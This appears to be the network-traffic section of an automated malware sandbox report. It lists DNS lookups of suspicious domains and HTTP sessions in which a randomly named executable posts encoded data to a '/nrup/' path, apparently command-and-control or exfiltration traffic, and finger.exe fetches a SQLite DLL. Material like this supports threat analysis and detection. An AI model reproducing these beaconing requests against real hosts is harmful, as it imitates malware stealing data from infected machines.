May 3, 2024 11:35:33.865685940 CEST	49207	80	192.168.2.22	208.91.197.27
May 3, 2024 11:35:33.955486059 CEST	80	49207	208.91.197.27	192.168.2.22
May 3, 2024 11:35:33.955605984 CEST	49207	80	192.168.2.22	208.91.197.27
May 3, 2024 11:35:33.955884933 CEST	49207	80	192.168.2.22	208.91.197.27
May 3, 2024 11:35:34.047264099 CEST	80	49207	208.91.197.27	192.168.2.22
May 3, 2024 11:35:36.564827919 CEST	49208	80	192.168.2.22	208.91.197.27
May 3, 2024 11:35:36.652720928 CEST	80	49208	208.91.197.27	192.168.2.22
May 3, 2024 11:35:36.652775049 CEST	49208	80	192.168.2.22	208.91.197.27
May 3, 2024 11:35:36.653150082 CEST	49208	80	192.168.2.22	208.91.197.27
May 3, 2024 11:35:36.741293907 CEST	80	49208	208.91.197.27	192.168.2.22
May 3, 2024 11:35:39.239763975 CEST	49209	80	192.168.2.22	208.91.197.27
May 3, 2024 11:35:39.328959942 CEST	80	49209	208.91.197.27	192.168.2.22
May 3, 2024 11:35:39.329054117 CEST	49209	80	192.168.2.22	208.91.197.27
May 3, 2024 11:35:39.407793999 CEST	49209	80	192.168.2.22	208.91.197.27
May 3, 2024 11:35:39.514621019 CEST	80	49209	208.91.197.27	192.168.2.22
May 3, 2024 11:35:42.228962898 CEST	80	49209	208.91.197.27	192.168.2.22
May 3, 2024 11:35:42.228981972 CEST	80	49209	208.91.197.27	192.168.2.22
May 3, 2024 11:35:42.229053974 CEST	49209	80	192.168.2.22	208.91.197.27
May 3, 2024 11:35:42.229091883 CEST	80	49209	208.91.197.27	192.168.2.22
May 3, 2024 11:35:42.229160070 CEST	80	49209	208.91.197.27	192.168.2.22
May 3, 2024 11:35:42.229607105 CEST	49209	80	192.168.2.22	208.91.197.27
May 3, 2024 11:35:42.229655981 CEST	49209	80	192.168.2.22	208.91.197.27
May 3, 2024 11:35:42.317997932 CEST	80	49209	208.91.197.27	192.168.2.22
May 3, 2024 11:35:51.501267910 CEST	49210	80	192.168.2.22	172.67.145.66
May 3, 2024 11:35:51.588882923 CEST	80	49210	172.67.145.66	192.168.2.22
May 3, 2024 11:35:51.588958979 CEST	49210	80	192.168.2.22	172.67.145.66
May 3, 2024 11:35:51.589291096 CEST	49210	80	192.168.2.22	172.67.145.66
May 3, 2024 11:35:51.677139044 CEST	80	49210	172.67.145.66	192.168.2.22
May 3, 2024 11:35:51.677189112 CEST	49210	80	192.168.2.22	172.67.145.66
May 3, 2024 11:35:51.687238932 CEST	80	49210	172.67.145.66	192.168.2.22
May 3, 2024 11:35:51.687633038 CEST	80	49210	172.67.145.66	192.168.2.22
May 3, 2024 11:35:51.687678099 CEST	49210	80	192.168.2.22	172.67.145.66
May 3, 2024 11:35:51.764873028 CEST	80	49210	172.67.145.66	192.168.2.22
May 3, 2024 11:35:51.775384903 CEST	80	49210	172.67.145.66	192.168.2.22
May 3, 2024 11:35:54.382038116 CEST	49211	80	192.168.2.22	172.67.145.66
May 3, 2024 11:35:54.469541073 CEST	80	49211	172.67.145.66	192.168.2.22
May 3, 2024 11:35:54.469607115 CEST	49211	80	192.168.2.22	172.67.145.66
May 3, 2024 11:35:54.469894886 CEST	49211	80	192.168.2.22	172.67.145.66
May 3, 2024 11:35:54.557028055 CEST	80	49211	172.67.145.66	192.168.2.22
May 3, 2024 11:35:54.567426920 CEST	80	49211	172.67.145.66	192.168.2.22
May 3, 2024 11:35:54.568365097 CEST	80	49211	172.67.145.66	192.168.2.22
May 3, 2024 11:35:54.570619106 CEST	49211	80	192.168.2.22	172.67.145.66

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 3, 2024 11:32:01.066584110 CEST	54562	53	192.168.2.22	8.8.8.8
May 3, 2024 11:32:01.164259911 CEST	53	54562	8.8.8.8	192.168.2.22
May 3, 2024 11:32:31.531164885 CEST	52917	53	192.168.2.22	8.8.8.8
May 3, 2024 11:32:31.630578995 CEST	53	52917	8.8.8.8	192.168.2.22
May 3, 2024 11:32:38.589088917 CEST	62751	53	192.168.2.22	8.8.8.8
May 3, 2024 11:32:38.686022043 CEST	53	62751	8.8.8.8	192.168.2.22
May 3, 2024 11:32:47.496979952 CEST	57893	53	192.168.2.22	8.8.8.8
May 3, 2024 11:32:47.892827034 CEST	53	57893	8.8.8.8	192.168.2.22
May 3, 2024 11:32:49.731679916 CEST	57893	53	192.168.2.22	8.8.8.8
May 3, 2024 11:32:50.123024940 CEST	53	57893	8.8.8.8	192.168.2.22
May 3, 2024 11:33:04.487184048 CEST	54821	53	192.168.2.22	8.8.8.8
May 3, 2024 11:33:04.587826967 CEST	53	54821	8.8.8.8	192.168.2.22
May 3, 2024 11:33:17.725126028 CEST	54719	53	192.168.2.22	8.8.8.8
May 3, 2024 11:33:17.849229097 CEST	53	54719	8.8.8.8	192.168.2.22
May 3, 2024 11:33:35.585443974 CEST	49881	53	192.168.2.22	8.8.8.8
May 3, 2024 11:33:35.764610052 CEST	53	49881	8.8.8.8	192.168.2.22
May 3, 2024 11:33:49.221858978 CEST	54998	53	192.168.2.22	8.8.8.8
May 3, 2024 11:33:49.366764069 CEST	53	54998	8.8.8.8	192.168.2.22
May 3, 2024 11:34:04.244278908 CEST	52781	53	192.168.2.22	8.8.8.8
May 3, 2024 11:34:04.433578968 CEST	53	52781	8.8.8.8	192.168.2.22
May 3, 2024 11:34:25.792675972 CEST	63926	53	192.168.2.22	8.8.8.8
May 3, 2024 11:34:25.907239914 CEST	53	63926	8.8.8.8	192.168.2.22
May 3, 2024 11:34:39.405184984 CEST	65510	53	192.168.2.22	8.8.8.8
May 3, 2024 11:34:39.552103043 CEST	53	65510	8.8.8.8	192.168.2.22
May 3, 2024 11:34:59.280491114 CEST	62672	53	192.168.2.22	8.8.8.8
May 3, 2024 11:34:59.381012917 CEST	53	62672	8.8.8.8	192.168.2.22
May 3, 2024 11:35:14.808856010 CEST	56475	53	192.168.2.22	8.8.8.8
May 3, 2024 11:35:14.947480917 CEST	53	56475	8.8.8.8	192.168.2.22
May 3, 2024 11:35:31.144016981 CEST	49384	53	192.168.2.22	8.8.8.8
May 3, 2024 11:35:31.260916948 CEST	53	49384	8.8.8.8	192.168.2.22
May 3, 2024 11:35:51.395452976 CEST	54842	53	192.168.2.22	8.8.8.8
May 3, 2024 11:35:51.497364998 CEST	53	54842	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 3, 2024 11:32:01.066584110 CEST	192.168.2.22	8.8.8.8	0xb6c3	Standard query (0)	covid19help.top	A (IP address)	IN (0x0001)	false
May 3, 2024 11:32:31.531164885 CEST	192.168.2.22	8.8.8.8	0x52f5	Standard query (0)	www.thechurchinkaty.com	A (IP address)	IN (0x0001)	false
May 3, 2024 11:32:38.589088917 CEST	192.168.2.22	8.8.8.8	0xe0ad	Standard query (0)	www.sqlite.org	A (IP address)	IN (0x0001)	false
May 3, 2024 11:32:47.496979952 CEST	192.168.2.22	8.8.8.8	0xed0a	Standard query (0)	www.hggg2qyws.sbs	A (IP address)	IN (0x0001)	false
May 3, 2024 11:32:49.731679916 CEST	192.168.2.22	8.8.8.8	0xed0a	Standard query (0)	www.hggg2qyws.sbs	A (IP address)	IN (0x0001)	false
May 3, 2024 11:33:04.487184048 CEST	192.168.2.22	8.8.8.8	0x7058	Standard query (0)	www.297tamatest1kb.com	A (IP address)	IN (0x0001)	false
May 3, 2024 11:33:17.725126028 CEST	192.168.2.22	8.8.8.8	0x6747	Standard query (0)	www.quirkyquotients.online	A (IP address)	IN (0x0001)	false
May 3, 2024 11:33:35.585443974 CEST	192.168.2.22	8.8.8.8	0x6dc3	Standard query (0)	www.zopter.dev	A (IP address)	IN (0x0001)	false
May 3, 2024 11:33:49.221858978 CEST	192.168.2.22	8.8.8.8	0xf497	Standard query (0)	www.gudvain.top	A (IP address)	IN (0x0001)	false
May 3, 2024 11:34:04.244278908 CEST	192.168.2.22	8.8.8.8	0x47b3	Standard query (0)	www.nimaster.com	A (IP address)	IN (0x0001)	false
May 3, 2024 11:34:25.792675972 CEST	192.168.2.22	8.8.8.8	0x1e	Standard query (0)	www.deniztemiz.fun	A (IP address)	IN (0x0001)	false
May 3, 2024 11:34:39.405184984 CEST	192.168.2.22	8.8.8.8	0xeaaa	Standard query (0)	www.agoraeubebo.com	A (IP address)	IN (0x0001)	false
May 3, 2024 11:34:59.280491114 CEST	192.168.2.22	8.8.8.8	0xfe32	Standard query (0)	www.5597043.com	A (IP address)	IN (0x0001)	false
May 3, 2024 11:35:14.808856010 CEST	192.168.2.22	8.8.8.8	0xe744	Standard query (0)	www.domprojekt.pro	A (IP address)	IN (0x0001)	false
May 3, 2024 11:35:31.144016981 CEST	192.168.2.22	8.8.8.8	0x8b6d	Standard query (0)	www.northeastcol0r.com	A (IP address)	IN (0x0001)	false
May 3, 2024 11:35:51.395452976 CEST	192.168.2.22	8.8.8.8	0x5015	Standard query (0)	www.rtp7winbet.one	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 3, 2024 11:32:01.164259911 CEST	8.8.8.8	192.168.2.22	0xb6c3	No error (0)	covid19help.top		172.67.175.222	A (IP address)	IN (0x0001)	false
May 3, 2024 11:32:01.164259911 CEST	8.8.8.8	192.168.2.22	0xb6c3	No error (0)	covid19help.top		104.21.83.128	A (IP address)	IN (0x0001)	false
May 3, 2024 11:32:31.630578995 CEST	8.8.8.8	192.168.2.22	0x52f5	No error (0)	www.thechurchinkaty.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
May 3, 2024 11:32:31.630578995 CEST	8.8.8.8	192.168.2.22	0x52f5	No error (0)	parkingpage.namecheap.com		91.195.240.19	A (IP address)	IN (0x0001)	false
May 3, 2024 11:32:38.686022043 CEST	8.8.8.8	192.168.2.22	0xe0ad	No error (0)	www.sqlite.org		45.33.6.223	A (IP address)	IN (0x0001)	false
May 3, 2024 11:32:47.892827034 CEST	8.8.8.8	192.168.2.22	0xed0a	No error (0)	www.hggg2qyws.sbs	xiaoyue.zhuangkou.com		CNAME (Canonical name)	IN (0x0001)	false
May 3, 2024 11:32:47.892827034 CEST	8.8.8.8	192.168.2.22	0xed0a	No error (0)	xiaoyue.zhuangkou.com		47.238.226.135	A (IP address)	IN (0x0001)	false
May 3, 2024 11:32:50.123024940 CEST	8.8.8.8	192.168.2.22	0xed0a	No error (0)	www.hggg2qyws.sbs	xiaoyue.zhuangkou.com		CNAME (Canonical name)	IN (0x0001)	false
May 3, 2024 11:32:50.123024940 CEST	8.8.8.8	192.168.2.22	0xed0a	No error (0)	xiaoyue.zhuangkou.com		47.238.226.135	A (IP address)	IN (0x0001)	false
May 3, 2024 11:33:04.587826967 CEST	8.8.8.8	192.168.2.22	0x7058	No error (0)	www.297tamatest1kb.com		162.255.119.150	A (IP address)	IN (0x0001)	false
May 3, 2024 11:33:17.849229097 CEST	8.8.8.8	192.168.2.22	0x6747	No error (0)	www.quirkyquotients.online		66.96.162.142	A (IP address)	IN (0x0001)	false
May 3, 2024 11:33:35.764610052 CEST	8.8.8.8	192.168.2.22	0x6dc3	No error (0)	www.zopter.dev	zopter.dev		CNAME (Canonical name)	IN (0x0001)	false
May 3, 2024 11:33:35.764610052 CEST	8.8.8.8	192.168.2.22	0x6dc3	No error (0)	zopter.dev		192.185.225.30	A (IP address)	IN (0x0001)	false
May 3, 2024 11:33:49.366764069 CEST	8.8.8.8	192.168.2.22	0xf497	No error (0)	www.gudvain.top		203.161.62.199	A (IP address)	IN (0x0001)	false
May 3, 2024 11:34:04.433578968 CEST	8.8.8.8	192.168.2.22	0x47b3	No error (0)	www.nimaster.com		217.26.48.101	A (IP address)	IN (0x0001)	false
May 3, 2024 11:34:25.907239914 CEST	8.8.8.8	192.168.2.22	0x1e	No error (0)	www.deniztemiz.fun		46.28.105.2	A (IP address)	IN (0x0001)	false
May 3, 2024 11:34:39.552103043 CEST	8.8.8.8	192.168.2.22	0xeaaa	No error (0)	www.agoraeubebo.com	agoraeubebo.com		CNAME (Canonical name)	IN (0x0001)	false
May 3, 2024 11:34:39.552103043 CEST	8.8.8.8	192.168.2.22	0xeaaa	No error (0)	agoraeubebo.com		162.240.81.18	A (IP address)	IN (0x0001)	false
May 3, 2024 11:34:59.381012917 CEST	8.8.8.8	192.168.2.22	0xfe32	No error (0)	www.5597043.com		91.195.240.94	A (IP address)	IN (0x0001)	false
May 3, 2024 11:35:14.947480917 CEST	8.8.8.8	192.168.2.22	0xe744	No error (0)	www.domprojekt.pro	domprojekt.pro		CNAME (Canonical name)	IN (0x0001)	false
May 3, 2024 11:35:14.947480917 CEST	8.8.8.8	192.168.2.22	0xe744	No error (0)	domprojekt.pro		46.242.239.47	A (IP address)	IN (0x0001)	false
May 3, 2024 11:35:31.260916948 CEST	8.8.8.8	192.168.2.22	0x8b6d	No error (0)	www.northeastcol0r.com		208.91.197.27	A (IP address)	IN (0x0001)	false
May 3, 2024 11:35:51.497364998 CEST	8.8.8.8	192.168.2.22	0x5015	No error (0)	www.rtp7winbet.one		172.67.145.66	A (IP address)	IN (0x0001)	false
May 3, 2024 11:35:51.497364998 CEST	8.8.8.8	192.168.2.22	0x5015	No error (0)	www.rtp7winbet.one		104.21.39.119	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

covid19help.top

www.thechurchinkaty.com

www.sqlite.org

www.hggg2qyws.sbs

www.297tamatest1kb.com

www.quirkyquotients.online

www.zopter.dev

www.gudvain.top

www.nimaster.com

www.deniztemiz.fun

www.agoraeubebo.com

www.5597043.com

www.domprojekt.pro

www.northeastcol0r.com

www.rtp7winbet.one

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49164	91.195.240.19	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:32:31.814898968 CEST	478	OUT	GET /nrup/?pX6dR=a+HLDFsiIkHuV4rg9hSpoeAycD7cgouMO9xbFOtVeNEzn7JMPDdWHI+uhZWQfHs/Ujvr+dR2RkWjKutxCrTuIvieTAa4VE7MqIx0HySFP6zbT2TnTvQ9seTn5ysI&tv=6TdD8B HTTP/1.1 Host: www.thechurchinkaty.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
May 3, 2024 11:32:31.992171049 CEST	107	IN	HTTP/1.1 439 date: Fri, 03 May 2024 09:32:31 GMT content-length: 0 server: NginX connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49165	45.33.6.223	80	3180	C:\Windows\SysWOW64\finger.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:32:38.821258068 CEST	212	OUT	GET /2018/sqlite-dll-win32-x86-3240000.zip HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Host: www.sqlite.org Connection: Keep-Alive Cache-Control: no-cache
May 3, 2024 11:32:38.947175026 CEST	249	IN	HTTP/1.1 200 OK Connection: keep-alive Date: Fri, 03 May 2024 09:32:38 GMT Last-Modified: Mon, 10 Sep 2018 14:57:36 GMT Cache-Control: max-age=120 ETag: "m5b968660s6f0bb" Content-type: application/zip; charset=utf-8 Content-length: 454843
May 3, 2024 11:32:38.947237015 CEST	1289	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 b7 16 c5 4c de 11 68 82 20 05 00 00 82 15 00 00 0b 00 1c 00 73 71 6c 69 74 65 33 2e 64 65 66 55 54 09 00 03 c9 98 15 5b c9 98 15 5b 75 78 0b 00 01 04 e8 03 00 00 04 64 00 00 00 85 98 4b 73 dc 36 0c 80 ef f9 37 89 3b Data Ascii: PKLh sqlite3.defUT[[uxdKs67;I{MCIcTz>vd ~_?I]x=\|&h7<-&t"-;\|pV<IN2sO^l5aVA)NNalF\|<SjnC-k
May 3, 2024 11:32:38.947288036 CEST	1289	IN	Data Raw: 49 ea 6e 93 57 99 ea 7f 31 8d f2 a8 61 81 7c 95 fa e5 db 24 dd 44 a7 27 76 cc 8b c3 54 9a 82 df fe fc 8d 8a ad 9e b4 f1 3a 58 f1 55 b2 78 da ab 0c 74 e4 f3 0e b4 ed a6 fc da c8 2c 60 8d c2 da f8 c4 cc 64 1e aa a2 b9 bf 51 f5 27 b8 6b cb f2 8d 36 Data Ascii: InW1a\|$D'vT:XUxt,`dQ'k6/9_PKLaYGsqlite3.dllUT[[uxdtT8I&aN`DjFfHI&"AB<%cVmk?>D@!
May 3, 2024 11:32:38.947307110 CEST	1289	IN	Data Raw: 6b 6c e2 63 5f 44 22 90 08 13 6c 76 fd b3 39 0e 6b 81 2e 46 e4 23 a9 44 85 51 28 6d 54 de bc 19 c1 ab 3f 87 41 56 bc 91 98 b2 30 dd e5 df 53 6f 8c 02 10 0f c7 c2 4d d5 2b 83 99 fa 9b 74 a3 3c ca 49 2f 5d dd d8 4f af b0 82 5a 0d 1b 4f cc b2 45 bd Data Ascii: klc_D"lv9k.F#DQ(mT?AV0SoM+t<I/]OZOENqFG!u&Tg:gNWd6E~*X&zSf1l(q]Ecl`>g+igD7.4`Ll4HU(\|Z4D%#cG&?YM
May 3, 2024 11:32:38.947325945 CEST	1289	IN	Data Raw: 07 16 7f 27 e9 92 eb da e4 f6 48 fd e8 7c ae 25 f9 ac 76 20 d4 be 63 b6 dc 12 91 03 aa 09 d7 69 a5 38 0b d6 18 e4 0e 6a 53 31 4d 4c 1e ec 94 db 4d 83 67 69 d1 79 c2 91 95 bc 66 a5 a5 e7 89 85 94 f0 72 a0 d3 24 3c d7 e0 1e 13 9e ab ab 6a 90 6e 93 Data Ascii: 'H\|%v ci8jS1MLMgiyfr$<jnm&W+zm7P_'7$m_SjAZ}/84y(r.N~R/'8=I;ylN9OkS>qu#5<H}d!+Y($xDh/`c{Z
May 3, 2024 11:32:38.947344065 CEST	1289	IN	Data Raw: a6 aa 98 71 b2 b4 10 d8 84 1d d9 28 32 1c 32 81 e4 08 63 47 5a 06 3f 03 54 44 4e 92 06 ea 4d b5 78 9d c4 91 0e 7c 3b 0f 85 ad f5 43 f3 e1 c7 a6 fe 27 48 67 86 1c 41 5a b0 be 32 5a 38 cf 1f 59 66 53 56 02 7f 56 16 6a 2f 23 c5 f3 a4 d9 d0 2a 4e 8c Data Ascii: q(22cGZ?TDNMx\|;C'HgAZ2Z8YfSVVj/#N/o}IE@iaR0IfymtFmt1-L\|_8)L-tv^JO}In]Le%#Ku!tj">GQ;^Tl~gjhT)_L*G
May 3, 2024 11:32:38.947405100 CEST	1289	IN	Data Raw: 84 43 de 7c 77 53 40 a0 f9 6f 54 14 c0 20 aa 59 80 f1 b5 30 f5 8a f8 b2 f0 0b 6c 65 7e 04 f7 3a e0 a3 ed 79 fe b7 e2 0c 9d 01 69 2a a1 9e 74 d2 81 2c 8a ab 5d a9 e0 14 ef d8 fa c1 41 57 bb f0 47 98 fd 97 f6 39 c2 9b 06 b7 a7 41 8d 4a 31 a7 e4 9a Data Ascii: C\|wS@oT Y0le~:yit,]AWG9AJ1zMoU/-YL\|}tg:p>Xi\qH+7>}W't2AE%f9RIo&C:]I\|y5fHs'WU\|\R&67mY+!};E
May 3, 2024 11:32:38.947422981 CEST	1289	IN	Data Raw: 8a 87 f5 93 58 60 19 81 c2 9a e8 76 5e 68 11 8e 33 81 bd 2f 79 44 1e 8d 47 0c eb ef 95 a6 32 f1 bc 0c 18 63 de a4 dd 08 b8 96 fa 7b df f3 a9 ef a5 a6 b3 0f ea 7f ab c8 10 72 29 75 72 77 82 07 50 2b 0c ae 83 9d 52 e8 23 2c 8f 4c 81 aa 48 f3 1a e1 Data Ascii: X`v^h3/yDG2c{r)urwP+R#,LHH1ff)"EL7Jh.''aN!m<}n1\3p4KC.:c!}[@=f#V%4R?@$f!&~j5d`1R
May 3, 2024 11:32:38.947439909 CEST	1289	IN	Data Raw: 8b 37 05 47 9f 13 67 bb 5a b5 3b e4 4f bd c1 8b 5f 08 cf d5 0b b5 ad da f5 c1 91 3c ad df d5 5a 26 57 a4 99 76 cc c0 6f 23 9c f0 e3 7a ed a2 7e ec dd d2 48 5a 62 ac 6a 6c 28 85 06 7a 5d ed dc 09 12 00 e1 af 30 c5 7d 14 64 ef c0 63 9b 8f 3a b8 7a Data Ascii: 7GgZ;O_<Z&Wvo#z~HZbjl(z]0}dc:z$A2[R+o,N(^;Y?P]qiepS;}7WGlQ_4UBc8G-I(OVvgOwhM'6"H>jg
May 3, 2024 11:32:38.947483063 CEST	1289	IN	Data Raw: cf bc f8 cf f0 26 1a c4 bf b0 64 18 82 93 ce b2 85 32 13 90 cf 8e 38 65 5b 44 b3 28 bb 38 f7 58 e0 6f d0 95 78 f7 98 50 04 14 64 12 17 53 2a 57 f0 a6 09 f1 47 e7 8c 6d b4 d0 3a 89 33 06 7c 35 9b 7d 2d 04 42 43 1a 01 1b 66 af 4e b1 89 89 1e ed f2 Data Ascii: &d28e[D(8XoxPdS*WGm:3\|5}-BCfNEh4{n%gd585><aaA\02+]?Xz$a5gg.n>$#4AN'QZk8=4PaOKrP^evm4^KrxW
May 3, 2024 11:32:39.072850943 CEST	1289	IN	Data Raw: 33 1a 84 fd f0 e8 57 85 fd 1d 19 6d 6e 9f 2a 28 3f 44 f6 c4 7d 41 f8 2e 6b a6 af 8f 7a 1c 65 ee 5c c7 6e 07 bb 62 5c 59 4e 4b fb ca e8 ae 59 b0 af 66 55 fe 27 96 66 a7 87 71 30 0c f7 c3 54 bb 07 c5 25 ca 53 f8 42 1f c9 cc 18 a2 a9 32 60 a3 9b 0c Data Ascii: 3Wmn*(?D}A.kze\nb\YNKYfU'fq0T%SB2`{~U{{#Pq2S+]\5{t^jYkUjA;a_!%ro2y u{?K;:Nw/TU!;iI$4}K{eLA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49166	47.238.226.135	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:32:50.649478912 CEST	2578	OUT	POST /nrup/ HTTP/1.1 Host: www.hggg2qyws.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.hggg2qyws.sbs Connection: close Content-Length: 2162 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.hggg2qyws.sbs/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 52 7a 67 2b 4f 43 36 4d 75 47 43 44 31 71 4d 55 70 79 35 55 50 38 75 48 6a 79 53 75 2f 65 47 45 59 49 35 4b 31 6b 78 79 52 5a 59 53 42 39 4d 6e 4e 55 41 66 71 74 64 55 78 67 64 67 39 72 41 4d 38 48 75 4f 47 36 50 55 46 4e 6b 2f 2f 33 75 39 32 2b 72 53 41 68 77 49 42 61 5a 38 37 6a 4f 48 4b 33 73 72 76 77 50 39 4b 30 4c 59 58 4c 2f 2b 59 66 54 4f 4a 48 64 7a 36 43 30 77 71 45 45 39 38 67 32 43 2b 57 6d 72 33 2f 4c 75 4b 51 4c 30 4d 36 65 78 50 32 72 72 4b 50 35 6d 57 43 32 65 64 58 6f 6f 58 53 41 70 51 67 46 4a 6f 78 41 37 4e 32 43 32 62 4c 46 37 55 54 30 66 59 59 42 58 2f 77 34 31 6a 71 6f 65 57 51 6b 30 7a 4a 39 4d 68 4b 42 6e 71 71 53 39 37 59 67 66 69 79 37 34 44 50 72 7a 46 44 71 37 39 6a 5a 4c 47 4c 64 38 57 74 70 44 6a 5a 71 4d 51 30 74 4f 58 76 4a 48 4e 66 55 52 31 68 45 65 47 38 36 44 65 36 51 61 64 65 79 38 43 4d 55 57 34 51 71 51 44 64 68 32 75 66 48 5a 53 73 6d 53 6a 51 55 55 6c 53 62 2f 37 62 49 4a 41 6f 4d 37 67 64 39 6a 6e 50 49 38 56 45 59 36 50 76 6f 67 73 4a 50 51 [TRUNCATED] Data Ascii: pX6dR=Rzg+OC6MuGCD1qMUpy5UP8uHjySu/eGEYI5K1kxyRZYSB9MnNUAfqtdUxgdg9rAM8HuOG6PUFNk//3u92+rSAhwIBaZ87jOHK3srvwP9K0LYXL/+YfTOJHdz6C0wqEE98g2C+Wmr3/LuKQL0M6exP2rrKP5mWC2edXooXSApQgFJoxA7N2C2bLF7UT0fYYBX/w41jqoeWQk0zJ9MhKBnqqS97Ygfiy74DPrzFDq79jZLGLd8WtpDjZqMQ0tOXvJHNfUR1hEeG86De6Qadey8CMUW4QqQDdh2ufHZSsmSjQUUlSb/7bIJAoM7gd9jnPI8VEY6PvogsJPQbZ2OFK/U59jJAMoVUcBdDWEPIm5xOXqWFgQYv3vQjZbO1Az2MBvEa1X6GFCicifvmJNcRDtUIGxOgYsJbDcoxiEIrNGs9g2G7tQb+jYgmevRrryNF1CDCSG3eLnXQxu9y5S2vgj+PLMiNJmieeUYj5lEMUBvd06o9LkYx0wqxcir3mSzZzl4RhyF0m6v8u2CFBevbwfM93ZLJvsnwC5J6Zbj43Rpfd2QeYkntgsb/sqp8QNzJUDldul1LQoBYTyu9VuqrGW21jAGO0bBTc8g3+l1kJovOdPuHIa1LdkA5SLXROWGIALzhRqoNgnwwU7Fcj7msAm7o1i6eHpGsci2z9iHt3KfWySABqUoCN4En3FRzUl57Wd+YSVbAbb/0ORuO4EITtMsUskeLm7RiXT54QntLWBtyAtwKI+EmdWU553NE/6J+IMRch13oJNUSSrEbg1iHioXAcm46+jqu+3vZAS19P7qHeTjV1knZNq3eyAK0vEqBGOkdcAigcbeKNSwioRrFCWxWg4cbvMdgMazlbGYimav9DAf5WrHq8FcEDqnFLpLS3T6Gx4xI5+WYBS8cGknzMBz42QBEIezQKGvSSdtFr4R52rWjNY0Fo9bHqTvUKJVS+1bpCLvacRL+OtmLz/fIRq2C+84FUFOGK1bzjAqf2O3wO2V1v [TRUNCATED]
May 3, 2024 11:32:50.953944921 CEST	119	OUT	Data Raw: 79 79 56 41 56 2f 67 71 4d 61 51 44 76 55 74 62 73 44 5a 55 4a 36 31 70 47 4a 57 50 37 35 52 73 36 55 79 36 62 78 57 6c 35 55 30 4f 67 51 52 62 4d 2f 45 4e 4d 65 45 55 38 50 79 33 62 62 42 55 63 54 38 48 2b 56 65 68 37 6a 2f 62 50 65 32 72 37 58 Data Ascii: yyVAV/gqMaQDvUtbsDZUJ61pGJWP75Rs6Uy6bxWl5U0OgQRbM/ENMeEU8Py3bbBUcT8H+Veh7j/bPe2r7XLOshpVE6IOk/DqLvg1DzxYkjiJwxG3nyV2SQT
May 3, 2024 11:32:51.258389950 CEST	165	IN	HTTP/1.1 405 Not Allowed Server: nginx Date: Fri, 03 May 2024 09:32:50 GMT Content-Type: text/html Content-Length: 2 Connection: close ETag: "660279db-2" Data Raw: 31 0a Data Ascii: 1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.22	49167	47.238.226.135	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:32:53.522403955 CEST	736	OUT	POST /nrup/ HTTP/1.1 Host: www.hggg2qyws.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.hggg2qyws.sbs Connection: close Content-Length: 202 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.hggg2qyws.sbs/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 52 7a 67 2b 4f 43 36 4d 75 47 43 44 31 74 67 55 76 6a 35 55 64 4d 75 48 7a 69 53 75 6c 75 47 4b 59 49 6c 43 31 68 41 76 52 50 59 53 47 73 38 6e 4e 6e 6b 66 76 74 64 62 2b 41 64 6b 35 72 41 6a 38 48 76 6e 47 34 72 55 46 4e 67 2f 2f 55 47 39 6e 72 48 52 4a 78 77 57 4e 36 5a 73 37 6a 4c 35 4b 33 68 30 76 7a 50 39 4b 32 76 59 57 4c 76 2b 4f 70 6e 4f 62 48 64 31 76 53 30 6e 71 45 49 6b 38 67 6e 4e 2b 57 4b 72 32 4b 72 75 4b 43 44 30 49 70 47 78 42 6d 72 71 4e 50 34 5a 46 51 66 74 63 6d 30 64 4c 46 34 39 5a 78 51 70 6a 54 55 45 46 51 66 34 4d 4b 78 79 57 46 52 65 4f 37 46 59 6b 77 3d 3d Data Ascii: 